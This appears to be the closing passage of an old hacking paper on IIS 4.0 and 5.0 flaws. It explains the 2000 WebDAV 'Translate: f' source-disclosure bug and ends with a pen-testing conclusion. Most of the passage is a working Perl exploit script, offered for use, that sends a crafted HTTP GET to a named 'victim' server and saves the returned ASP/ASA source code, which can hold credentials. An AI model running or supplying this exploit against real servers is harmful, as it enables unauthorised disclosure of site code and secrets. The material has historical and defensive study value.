=============Translate:f Bug ====================
Daniel Docekal brought this issue in BugTraq this summer, August 15, 2000.
(www.securityfocus.com/bid/1578) The actual problem is with the WebDAV
implementation in office 2000 and FrontPage 2000 Server Extensions.
When someone makes a request for ASP/ASA or anyother scriptable page and
adds “translate:f “ into headers of HTTP GET (headers are not part of URL,
part of HTTP request), then they are come up with complete ASP/ASA source
code on Win2K SP1 not installed.
Translate:F is a legitimate header for WebDAV and is used in WebDAV
compatible client and in FP2000 to get the file for editing.
Simple adding of “translate:f” and placing “/” at the end of request to HTTP
GET will lead in security bug.
It is a Win2K bug, but due to FP2000 installed IIS4.00, it is also a IIS4.0
bug.
You can use the following perl script to use this exploit.
#############################
use IO::Socket; #
my ($port, $sock,$server); #
$size=0; #
#############################
#
$server="$ARGV[0]";
$s="$server";
$port="80";
$cm="$ARGV[1]";
&connect;
sub connect {
if ($#ARGV < 1) {
howto();
exit;
}
$ver="GET /$cm%5C HTTP/1.0
Host: $server
Accept: */*
Translate: f
\n\n";
my($iaddr,$paddr,$proto);
$iaddr = inet_aton($server) || die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) || die "Error: $!";
$proto = getprotobyname('tcp') || die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die "Error:
$!";
connect(SOCK, $paddr) || die "Error: $!";
send(SOCK, $ver, 0) || die "Can't to send packet: $!";
open(OUT, ">$server.txt");
print "Dumping $cm to $server.txt \n";
while(<SOCK>) {
print OUT <SOCK>;
}
sub howto {
print "type as follows: Trans.pl www.victim.com codetoview.asp \n\n";
}
close OUT;
$n=0;
$type=2;
close(SOCK);
exit(1);
}
If we call the script as translate.pl then we can get a ASA/ASP source code
as follows
Trasn.pl www.victim.com codetoview.asp


And there you go, you get the source code of codeview.asp.

04- Conclusion


All the information i have given you has been widely used in wild. However
what i tried to do was just to collect all these information together as to
check the security of our famous IIS 4.0 and 5.0. Wheneveri encounter a IIS
web server during my pen-tests, i do check for these vulnerabilities and
most of the time one of these works.
I hope that, what i written was helped you in some way. Thanks for reading
it, please continue to support me as i continue to release this sortta
papers. If you wanna learn more, please check the mentioned people’s web
sites for more details and you can even write to me.
Peace in mind
Watch your servers in wild
(c)governmentsecurity.org